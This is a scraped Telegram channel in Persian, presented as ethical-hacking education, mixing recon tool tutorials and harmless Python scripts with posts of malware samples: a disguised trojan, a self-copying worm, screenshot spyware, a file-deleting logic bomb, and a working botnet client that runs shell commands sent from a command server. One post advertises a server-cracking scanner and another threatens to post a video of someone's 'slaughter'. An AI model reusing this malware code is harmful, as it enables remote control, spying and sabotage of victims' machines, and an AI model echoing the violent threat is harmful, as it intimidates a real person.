DarkPacket
6.93K subscribers
23 photos
2 videos
22 files
45 links
> 🛡️ Ethical Hacking | Cyber Security

💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
newfile.py
3.8 KB
یک آی پی اسکنر برای کرک سرور
سرعت نسبتا خوبی داره
aiohttp
aiodns
colorama
اینم کتابخانه های قابل نصب
دیگه نیازی به توضیح اضافی نیست
دو سه روز سرم شلوغ مطمئن باشید جبران میکنم براتون
9
https://t.me/DarkpacketGroup
عضو شید بحث داغ
4
🌐 httpx — پیدا کردن سایت‌های فعال

اگه پست قبلی رو دیده باشی، با Subfinder یاد گرفتیم چطور Subdomainها رو پیدا کنیم.

حالا فرض کن Subfinder اینا رو بهت داده:

🔹 blog.example.com

🔹 api.example.com

🔹 dev.example.com

اما از کجا بفهمیم کدومشون واقعاً سایت یا سرویس وب فعال دارن؟ 🤔

اینجاست که httpx به کار میاد. 👇

🔎 httpx آدرس‌هایی که بهش می‌دی رو بررسی می‌کنه و مشخص می‌کنه کدوم‌ها از طریق
HTTP/HTTPS
قابل دسترسی هستن.

📌 نصب در Kali:
sudo apt install httpx-toolkit

بررسی یک سایت:
httpx -u https://example.com

یعنی:
👉 «ببین این آدرس یک سرویس وب فعال داره یا نه.»

📂 حالا اگر از Subfinder یک فایل از Subdomainها داشته باشیم:
httpx -l subdomains.txt

💾 ذخیره نتیجه داخل فایل:
httpx -l subdomains.txt -o live.txt

🎯 پس Workflow ساده ما میشه:

Subfinder 🔎 → پیدا کردن Subdomainها

httpx 🌐 → پیدا کردن Subdomainهای فعال

💡 یعنی:
اول پیدا کن -> بعد بررسی کن کدومشون زنده‌ان.

🛡️ کاربردها:
• بررسی سرویس‌های وب فعال

• Web Reconnaissance

• Bug Bounty

• Asset Discovery

🔗 GitHub:
https://github.com/projectdiscovery/httpx

⚠️ فقط روی دامنه‌ها و سیستم‌هایی که اجازه بررسی‌شون رو داری استفاده کن.

#Linux #KaliLinux #LightKali #HTTPX #BugBounty #WebSecurity
#Tyger
5🔥1
🐧 Linux Practical |

👤 الان با چه کاربری وارد شدی؟

فقط بزن:

"whoami"

و لینوکس نام کاربری فعلی رو بهت نشون می‌ده.

💡 قبل از اجرای دستورات حساس، دونستن اینکه با چه Userای کار می‌کنی خیلی مهمه.

#Linux #KaliLinux #LightKali #LinuxSecurity #CyberSecurity
#Tyger
🔥21
این حروم زاده رو میبینین تا چند روز دیگه فیلم سلاخی شدنشو میفرستم بیناموس با عابرو دخترا بازی میکنه
10🔥4💔1
ی ایمیل سندر بسازم؟
👍81
https://t.me/DarkpacketGroup
جوین بدین همتون
گروهمونه
4
🕷 Katana — پیدا کردن مسیرهای داخل یک سایت

تا اینجا یاد گرفتیم:
🔎 Subfinder → پیدا کردن Subdomainها

🌐 httpx → پیدا کردن سرویس‌های وب فعال

حالا سؤال اینه: داخل یک سایت چه صفحه‌ها و مسیرهایی وجود داره؟ 🤔

اینجاست که Katana وارد میشه.

🕷 Katana یک ابزار Web Crawler هست؛ یعنی مثل یک عنکبوت 🕸️ لینک‌های داخل یک سایت رو دنبال می‌کنه و آدرس‌هایی که پیدا می‌کنه رو جمع‌آوری می‌کنه.

مثلاً ممکنه از این:
https://example.com
به چیزهایی مثل این برسه:
🔹 /login

🔹 /about

🔹 /contact

🔹 /api/users

به این آدرس‌های مشخص داخل برنامه معمولاً Endpoint می‌گیم.

📌 نصب در Kali:
sudo apt install katana

استفاده ساده:
katana -u https://example.com

یعنی:

👉 «لینک‌ها و مسیرهایی که از این سایت قابل پیدا کردن هستن رو جمع‌آوری کن.»

💾 ذخیره نتیجه:
katana -u https://example.com -o endpoints.txt


🎯 حالا Workflow ما داره کامل‌تر میشه:
Subfinder 🔎

⬇️

پیدا کردن Subdomainها
httpx 🌐

⬇️

پیدا کردن سرویس‌های وب فعال
Katana 🕷️

⬇️

پیدا کردن لینک‌ها و Endpointها

💡 خلاصه:
Subfinder میگه «چه سایت‌های فرعی‌ای وجود دارن؟»
httpx میگه «کدومشون فعالن؟»
Katana میگه «داخل این سایت چه مسیرهایی پیدا میشه؟»

🛡️ کاربردها:
• Web Recon
• Endpoint Discovery
• بررسی ساختار Web Application
• Bug Bounty

🔗 GitHub:
https://github.com/projectdiscovery/katana

⚠️ فقط روی سایت‌ها و سیستم‌هایی که اجازه بررسی‌شون رو داری استفاده کن.

#KaliLinux #Linux #LightKali #Katana #BugBounty #WebSecurity #CyberSecurity #Tyger
2🔥1
radar.py
3.8 KB
📡 Advanced Radar — شبیه‌سازی رادار با Python

این پروژه با استفاده از Python + Pygame یک رادار گرافیکی متحرک ایجاد می‌کنه.

🔹 نمایش محدوده‌های دایره‌ای رادار
🔹 حرکت خط اسکن به‌صورت ۳۶۰ درجه
🔹 Targetهای متحرک با افکت Pulse
🔹 اضافه و حذف شدن تصادفی Targetها
🔹 اجرای روان با نرخ 60 FPS

📦 نصب Pygame:

sudo apt update && sudo apt install python3-pygame -y

🚀 اجرا:

python3 radar.py

⚠️ این پروژه صرفاً یک شبیه‌سازی گرافیکی است و هیچ اسکن واقعی شبکه یا سیستم انجام نمی‌دهد.

#Python #Pygame #CyberSecurity #Programming #Radar #KaliLinux #Linux #LightKali
#Tyger
5👎2
Forwarded from EDA Foldery
🔹🔹🔹🔹🔹🔹🔹🔹
با توجه به اوضاع اینترنت و احتمال جنگ، تصمیم گرفتم چنل‌های پولی V.I.P رو که کلی هزینه دارن، به صورت رایگان براتون پابلیک کنم تا خیالتون راحت باشه.🥹🔹🔹
#تبلیغ_نیست
🔹🔹🔹🔹🔹🔹🔹🔹
Please open Telegram to view this post
VIEW IN TELEGRAM
2
log_analyzer.py
739 B
🕵️ Log Analyzer — تحلیل لاگ‌های SSH با Python

با این اسکریپت می‌تونی لاگ‌های SSH رو بررسی کنی و تلاش‌های ناموفق ورود رو بر اساس IP شناسایی کنی.

🔹 استخراج IPهای ناموفق
🔹 شمارش تلاش‌های ورود
🔹 شناسایی IPهای پرتکرار
🔹 هشدار برای فعالیت‌های مشکوک

🐧 نصب Python روی لینوکس:

sudo apt update
sudo apt install python3 -y

📁 اجرای اسکریپت:

python3 log_analyzer.py

📌 فایل لاگ موردنظر باید با نام "auth.log" کنار اسکریپت قرار داشته باشه.

⚠️ این ابزار فقط برای تحلیل لاگ‌های محلی و اهداف آموزشی استفاده می‌شود.

#Python #Linux #KaliLinux #LightKali #CyberSecurity #LogAnalysis #SSH #BlueTeam #SOC #Tyger
6
cyber_terminal.py
1 KB
🖥️ Cyber Terminal UI — ترمینال هکری نمایشی با Python

با چند خط Python می‌تونی یک ترمینال سایبری جذاب بسازی و مفاهیمی مثل رنگ‌بندی ترمینال، اجرای مرحله‌ای پیام‌ها و شبیه‌سازی فرآیندهای امنیتی رو تمرین کنی.

🔹 رابط کاربری سایبری

🔹 نمایش عملیات به‌صورت مرحله‌ای

🔹 افکت رنگی در Terminal

🔹 مناسب برای شروع Python در Linux

🔹 بدون نیاز به کتابخانه اضافی

🐧 نصب Python:

sudo apt update
sudo apt install python3 -y


📁 اسم فایل:
cyber_terminal.py

🚀 اجرا:

python3 cyber_terminal.py


⚠️ این پروژه کاملاً Simulation است و هیچ اسکن، حمله یا عملیات واقعی روی شبکه انجام نمی‌دهد.

#Python #Linux #KaliLinux #LightKali #CyberSecurity #CyberTerminal #Programming #Beginner
#Tyger
9
چخبر رفقا
92👎1
url_analyzer.py
747 B
🔎 URL Analyzer — تجزیه URL با Python

با این اسکریپت ساده می‌تونی یک URL رو بدون ارسال هیچ درخواستی به اینترنت، به بخش‌های مختلفش تقسیم کنی.

مثلاً از یک URL می‌تونیم این اطلاعات رو استخراج کنیم:
🔹 Protocol — پروتکل

🔹 Domain — دامنه

🔹 Port — پورت، در صورت وجود

🔹 Path — مسیر

🔹 Query — پارامترهای URL

🔹 Fragment — بخش Fragment

📦 نصب روی Linux:
این برنامه از کتابخانه استاندارد Python استفاده می‌کنه و نیازی به نصب کتابخانه اضافی نداره.

اگر Python روی سیستم نصب نیست:
sudo apt update
sudo apt install python3 -y

📁 اسم فایل:
url_analyzer.py

🚀 اجرا:
python3 url_analyzer.py

🧪 مثال:
Enter URL:
https://example.com/login?user=admin


💡 نکته برای مبتدی‌ها:

ماژول urllib.parse فقط URL را تجزیه (Parse) می‌کند؛ یعنی برای این اسکریپت DNS Lookup، Ping، Port Scan یا اتصال به سایت انجام نمی‌شود.

#Python #URLAnalyzer #Linux #KaliLinux #LightKali #CyberSecurity #Programming #PythonForBeginners #OSINT #Tyger
42🔥1
تروجان ساده (Disguised Trojan)

# trojan_demo.py
# این کد خود را به عنوان یک فایل بی‌ضرر نشان می‌دهد اما در پس‌زمینه عمل مخرب انجام می‌دهد

import os
import time

# ظاهر: نمایش یک پیام ساده
print("این یک برنامه ماشین حساب است")
print("عدد اول: 5، عدد دوم: 3، حاصل: 8")

# عمل مخرب: در پس‌زمینه یک فایل مخفی ایجاد می‌کند
time.sleep(2)
with open("/tmp/.hidden_note.txt", "w") as f:
f.write("این یک فایل مخرب است")

# ادامه ظاهر بی‌ضرر
print("برنامه با موفقیت اجرا شد")

نمونه جالبی بود گفتم بفرستم، مثلا باهاش میشه کار های زیادی انجام داد...

#Trojan #آموزش #ℳℴ𝒷𝒾𝓃
5🔥1
کرم خودتکثیر (Worm)

# worm_demo.py
# این کد خود را در پوشه‌های قابل نوشتن کپی می‌کند

import os
import shutil

current_file = __file__

# مسیرهای هدف (برای محیط آزمایشی فقط /tmp)
target_dirs = ["/tmp/worm1", "/tmp/worm2", "/tmp/worm3"]

for d in target_dirs:
try:
os.makedirs(d, exist_ok=True)
shutil.copy2(current_file, os.path.join(d, "copy.py"))
print(f"کپی شد به {d}")
except Exception as e:
print(f"خطا: {e}")

کار این کد هست خودش رو تو پوشه های دیگه سریع تکثیر میکنه، به تازگی تو دنیای سایبری خیلی رایج شده که شناسایی رو خیلی سخت می‌کنه.

#Worm #آموزش #ℳℴ𝒷𝒾𝓃
4🔥1
نرم‌افزار جاسوسی اسکرین‌شات (Spyware)

# screenshot_spy_demo.py
# این کد به‌طور دوره‌ای از صفحه عکس می‌گیرد

import time
import pyautogui
import os

output_dir = "/tmp/screenshots"
os.makedirs(output_dir, exist_ok=True)

count = 0
while count < 3: # فقط ۳ بار برای نمونه
screenshot = pyautogui.screenshot()
screenshot.save(os.path.join(output_dir, f"shot_{count}.png"))
print(f"اسکرین‌شات {count} ذخیره شد")
count += 1
time.sleep(5) # هر ۵ ثانیه

نیاز به pyautogui داره

باید اینو بزنید تا نصب کنید:
pip install pyautogui

این کد فقط ۳ تا تصویر میگیره که میتونید اصلاح کنید بیشتر کنید

#Spyware #آموزش #ℳℴ𝒷𝒾𝓃
5🔥2
بمب منطقی (Logic Bomb)

# logic_bomb_demo.py
# این کد در تاریخ مشخصی فعال می‌شود و عمل مخرب انجام می‌دهد

import datetime

# تاریخ فعال‌سازی (مثلاً ۱۰ ثانیه بعد)
activation_time = datetime.datetime.now() + datetime.timedelta(seconds=10)

while datetime.datetime.now() < activation_time:
pass # صبر کنید

# عمل مخرب: حذف یک فایل (در محیط آزمایشی فقط یک فایل بی‌ضرر)
import os
os.remove("/tmp/testfile.txt") # فرض کنید این فایل مهم است
print("بمب منفجر شد!")

برنامه به‌طور عادی کار می‌کند تا زمان مشخص، سپس خرابکاری می‌کند.

Logic Bomb تازگی ها زیادی معروف شده تو گیتهاب و دارک‌وب، گفتم یه نمونه جالب ازش بگذارم. 🌹

#Logic_Bomb #آموزش #ℳℴ𝒷𝒾𝓃
6🔥1
بات‌نت کلاینت (Botnet Client)

# botnet_client_demo.py
# این کد به یک سرور فرماندهی متصل می‌شود و دستورات را اجرا می‌کند

import socket
import subprocess

C2_SERVER = "127.0.0.1" # در محیط واقعی، آدرس سرور مهاجم
C2_PORT = 6666

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((C2_SERVER, C2_PORT))

while True:
command = s.recv(4096).decode()
if not command:
break
if command == "exit":
break
output = subprocess.run(command, shell=True, capture_output=True)
s.send(output.stdout + output.stderr)

s.close()

اول سرور C2 را اجرا کنید

که یک برنامه ساده است که دستور می‌فرستد

این کد به آن متصل می‌شود و دستورات را اجرا می‌کند

#Botnet_Client #Botnet #آموزش #ℳℴ𝒷𝒾𝓃
4🔥1
Forwarded from Light Kali
This media is not supported in your browser
VIEW IN TELEGRAM
پروژه LightKali نسخه ۹ به‌صورت رسمی و رایگان در دسترس عموم قرار گرفت.

علاقه‌مندان می‌توانند نسخه جدید را به‌صورت مستقیم و رایگان از طریق لینک زیر اجرا و آزمایش کنند:

https://LightKali.github.io/app/

مهم‌ترین تغییرات و بهبودهای نسخه ۹:

افزایش محسوس سرعت اجرای دستورات و بهینه‌سازی عملکرد کلی سیستم
پشتیبانی گسترده از بیش از ۲۰۰ دستور اصلی لینوکس و زیرشاخه‌های مرتبط
بازطراحی و توسعه سیستم VFS با معماری یکپارچه‌تر، قدرتمندتر و نزدیک‌تر به ساختار واقعی فایل‌سیستم
ارتقای کامل محیط BIOS با قابلیت‌های پیشرفته تعمیر و بازیابی سیستم
افزودن قابلیت‌های پیشرفته Spoofing و مکانیزم‌های مخفی‌سازی در محیط اجرا
افزایش سرعت بارگذاری و کاهش زمان راه‌اندازی بخش‌های مختلف سیستم
بهبود مدیریت پکیج‌ها، کنترل چرخه نصب و حذف، و بهینه‌سازی عملکرد Package Manager
ارتقای سیستم آنتی‌ویروس و فعال‌سازی کامل مکانیزم‌های بررسی و محافظت از پکیج‌ها و اجزای سیستم


نسخه ۹ با تمرکز بر عملکرد، پایداری، امنیت و نزدیک‌تر شدن تجربه LightKali به یک محیط واقعی لینوکس توسعه یافته است.
6🔥2